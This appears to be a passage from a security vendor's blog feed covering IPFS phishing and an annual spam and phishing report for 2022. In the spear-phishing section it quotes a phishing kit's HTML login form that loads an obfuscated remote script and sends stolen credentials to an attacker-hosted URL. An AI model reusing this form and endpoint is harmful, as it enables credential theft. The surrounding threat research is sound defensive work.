The use of a distributed file system allows attackers to cut back on phishing page hosting costs. Besides, you cannot delete files uploaded by third parties from IPFS. If somebody wants a file to disappear from the system completely, they can urge its owners to delete it, but the method will probably never work with cybercriminals anyway.

IPFS gateway providers attempt to combat IPFS phishing by regularly deleting links to fraudulent files.

Phishing page deletion notification

Phishing page deletion notification

Yet detection and deletion of links at gateway level does not always happen as quickly as the blocking of a phishing website, cloud form, or document. We have observed URL addresses of IPFS files that first appeared in October 2022 and remain operational at the time of this writing.

Phishing letters containing IPFS links are hardly ever too original — they contain the typical phishing content the purpose of which is to obtain the victim’s account login and password.

Phishing letter with an IPFS link

Phishing letter with an IPFS link

It is a bit more interesting to examine the HTML pages the links lead to.

HTML page used for phishing

HTML page used for phishing

As can be seen on the screenshot above, the URL parameter contains the recipient’s e-mail address. Once it is modified, the page content will change too: the corporate logo on top of the phishing form and the email address entered into the login field. In this way, one link can be used in several phishing campaigns targeting different users — sometimes even in dozens of campaigns.

Phishing page modification

Phishing page modification

The logo replacement effect is achieved using a simple JavaScript code. The script obtains domain info from the page URL parameter and substitutes it into the URL of the Google resource, from which a logo icon is then sourced.

Company logo substitution

Company logo substitution

Use of IPFS in targeted phishing attacks

The use of IPFS is not limited to mass mailing campaigns: it is used for complex targeted attacks too. Unlike the ordinary ones, targeted phishing campaigns are much better prepared, normally focusing on specific persons within the company, not just random users.

Targeted phishing with an IPFS link

Targeted phishing with an IPFS link

In the two examples above, the attacks were leveled at corporate procurement departments, the letters coming from sales managers of existing organizations. The phishing page itself lacks in originality.

Phishing page used in a targeted attack

Phishing page used in a targeted attack

Statistics

In late 2022, we were observing 2–15 thousand IPFS phishing letters a day for most of the time. But there were quieter days too. Thus, our systems registered only 637 such letters on December 1, and 937 on December 23. Starting this year, IPFS phishing began to grow in scale. We observed a few upsurges in January and February with over 24,000 letters a day — with peaks reaching 34–37 thousand/day. However, the flurry has died down little by little by mid-February, the number of attacks mostly returning to November and December levels.

Dynamics of the number of IPFS phishing attacks, November 2022 — February 2023 (download)

Yet it is worth noting that February turned out the busiest month in terms of IPFS phishing activity. In that month alone, we observed almost 400,000 letters — more than 20,000 above the January figure, and over 100,000 more than in November and December 2022.

IPFS phishing letters distribution by month, November 2022 — February 2023 (download)

Conclusion

Attackers have used and will continue to use cutting-edge technologies to reap profits. Of late, we observe an increase in the number of IPFS phishing attacks — both mass and targeted. The distributed file system allows scammers to save money on domain purchase. Plus, it is not easy to completely delete a file, although, there are attempts to combat fraud at IPFS gateway level. The good news is that anti-spam solutions detect and block links to phishing files in IPFS, just like any other phishing links. In particular, Kaspersky products employ a number of heuristics to detect IPFS phishing.

]]>
https://securelist.com/ipfs-phishing/109158/feed/ 0 full large medium thumbnail
Spam and phishing in 2022 https://securelist.com/spam-phishing-scam-report-2022/108692/ https://securelist.com/spam-phishing-scam-report-2022/108692/#comments Thu, 16 Feb 2023 08:00:07 +0000 https://kasperskycontenthub.com/securelist/?p=108692

Figures of the year

In 2022:

  • 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam
  • As much as 29.82% of all spam emails originated in Russia
  • Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments
  • Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links
  • 378,496 attempts to follow phishing links were associated with Telegram account hijacking

Phishing in 2022

Last year’s resonant global events

The year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the “preview”, the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.

Some websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.

Soccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.

Websites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.

Fake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.

The pandemic

The COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.

Scammers abused legitimate survey services by creating polls in the name of various organization to profit from victims’ personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the “charity” found the victim’s telephone number in a database of individuals affected by COVID-19. Those who wished to receive the “aid” were asked to state their full name, contact details, date of birth, social security and driver’s license numbers, gender, and current employer, attaching a scanned copy of their driver’s license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others’ personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.

Crypto phishing and crypto scams

The unabated popularity of cryptocurrency saw crypto scammers’ interest in wallet owners’ accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user’s secret phrase, cybercriminals could get access to their cryptocurrency balance.

In a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency — which they promised to give away and which they were trying to steal. The “giveaways” were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the “giveaways”. Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.

Compensation, bonus, and paid survey scams

Bonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that “financial assistance” is frequently promised by con artists to swindle you out of your money.

“Promotional campaigns by major banks” were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30–40. The cybercriminals used an array of techniques to lull victims’ vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar “campaigns” were staged in the name of other types of organizations, for example, the Polish finance ministry.

Aid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a “Ramadan Relief” program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as WF-AID, do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization’s logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive “recipient feedback” posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts—nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the “shipping costs”.

Growing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

“Insides” about “private sales” were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.

Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user’s appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the “update”, the victim was asked to enter their account credentials, which the scammers immediately took over.

Many Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.

Russia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users’ risk of losing personal data was now higher, too. “Well-wishers” who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search — the scammers simply stole the credentials they requested for the check.

One of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.

The Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to “test” a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

One more phishing campaign targeting Telegram users was arranged to coincide with the New Year’s celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children’s drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends’ kids’ works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years’ competition pages, as requests to vote for one’s friends’ kids are common before public holidays.

The Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.

Spam in 2022

The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of that is “Nigerian-type” scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.

Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims’ email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user’s email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.

Most scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190–4200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on “prizes” or “earning money”, messages in other languages, in addition to offering “prizes”, encouraged users to visit “dating sites” — in fact, populated by bots — where the victims would no doubt be asked to pay for a premium account.

We blocked upward of a million scam emails sent via legitimate forms in 2022.

Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.

To avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and “settle the matter”. Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim’s name to be removed from the “criminal case”. In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.

More and more “business offers” are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.

There were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

Spammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.

Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company’s profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.

Masking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.

In most cases, either the Qbot Trojan or Emotet was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.

Mailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender’s addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as “key points of the meeting”. For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up “as part of partial mobilization” or as a “new solution” to safeguard against possible threats on the internet “caused by hostile organizations”.

In the second case, the program installed on victim’s computer was in fact a crypto-ransomware Trojan.

Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.

Key facts:

  • Attackers use fake Dropbox pages created using a well-known phishing kit
  • The campaign targets the sales departments of manufacturers and suppliers of goods and services
  • Attackers use SMTP IP addresses and From domains provided by Microsoft Corporation and Google LLC (Gmail)

Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

Number of emails related to a two-step targeted campaign detected by Kaspersky solutions (download)

How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company’s products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender’s email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the From field is different to its name in the signature.

Example of the first email

Example of the first email

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use spoofing of the legitimate domain of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the From header (where the email came from) and Reply-to header (where the reply will go when clicking “Reply” in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the Reply-to header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

An email with a phishing link

An email with a phishing link

By clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

A fake WeTransfer page created using the same phish kit as the target campaign sites

A fake WeTransfer page created using the same phish kit as the target campaign sites

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

A fake Dropbox page

A fake Dropbox page

Login page with a phishing form

Login page with a phishing form

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

<form name="loginform">
          <div class="form-group">
            <label for="">Email Address</label>
            <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
            <div class="email-error"></div>
          </div>
          <div class="form-group">
            <label for="">Password</label>
            <input type="password" id="password" class="form-control" name="password" placeholder="Password">
            <div class="password-error"></div>
          </div>
          <div class="form-group btn-area">
            <button class="download-btn" id="db" type="submit">Download</button>
          </div>
        </form>
      </div>
      <script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&amp;token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>

HTML representation of a phishing form

Victims

We have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

Statistics: spam

Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

Share of spam in global email traffic, 2022 (download)

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.

On Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

Proportion of spam in Runet email traffic, 2022 (download)

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.

Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).

TOP 20 countries and territories — sources of spam, 2022 (download)

The Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That’s an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.

Number of Mail Anti-Virus hits, January — December 2022 (download)

The most common malicious email attachments in 2022, as in 2021, were Agensla Trojan stealers (7.14%), whose share decreased slightly. Noon spyware (4.89%) moved up to second place, and Badun Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits CVE-2018-0802 (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than CVE-2017-11882 exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.

TOP 10 malware families spread by email attachments in 2022 (download)

ISO Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the Guloader downloader family (2.65%), which delivers remotely controlled malware to victims’ devices. They are closely followed by the Badur family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous Emotet botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims’ devices, particularly ransomware. The ninth most popular family was Taskun (2.10%), which creates malicious tasks in the task scheduler.

TOP 10 types of malware spread by email attachments in 2022 (download)

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

Countries and territories targeted by malicious mailings

Spain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

TOP 20 countries and territories targeted by malicious mailings, 2022 (download)

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.

Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year’s ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

Country/territory Share of attacked users*
Vietnam 17.03%
Macau 13.88%
Madagascar 12.04%
Algeria 11.05%
Ecuador 11.05%
Malawi 10.91%
Brunei 10.59%
Brazil 10.57%
Morocco 10.43%
Portugal 10.33%

* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022

Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.

Most frequent top-level domains for phishing pages in 2022 (download)

Domains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

Organizations under phishing attacks

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

In 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

Distribution of organizations targeted by phishers, by category, 2022 (download)

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.

Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger’s users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we observed in late 2022 (article in Russian).

Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January — December 2022 (download)

It is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70–90% of all attempts to follow phishing links by Telegram users were made by Russian users.

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

Distribution of links blocked by the Safe Messaging component, by messenger, 2022 (download)

Phishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.

Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)

Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.

TOP 7 countries and territories where users most often clicked phishing links in WhatsApp (download)

Unlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)

Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.

TOP 7 countries and territories where users most frequently clicked phishing links from Telegram (download)

Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries’ markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we’ve seen an increase in targeted phishing attacks where scammers don’t immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

]]>
https://securelist.com/spam-phishing-scam-report-2022/108692/feed/ 1 full large medium thumbnail
Main phishing and scamming trends and techniques https://securelist.com/phishing-scam-techniques-tricks/108247/ https://securelist.com/phishing-scam-techniques-tricks/108247/#respond Tue, 06 Dec 2022 10:00:01 +0000 https://kasperskycontenthub.com/securelist/?p=108247

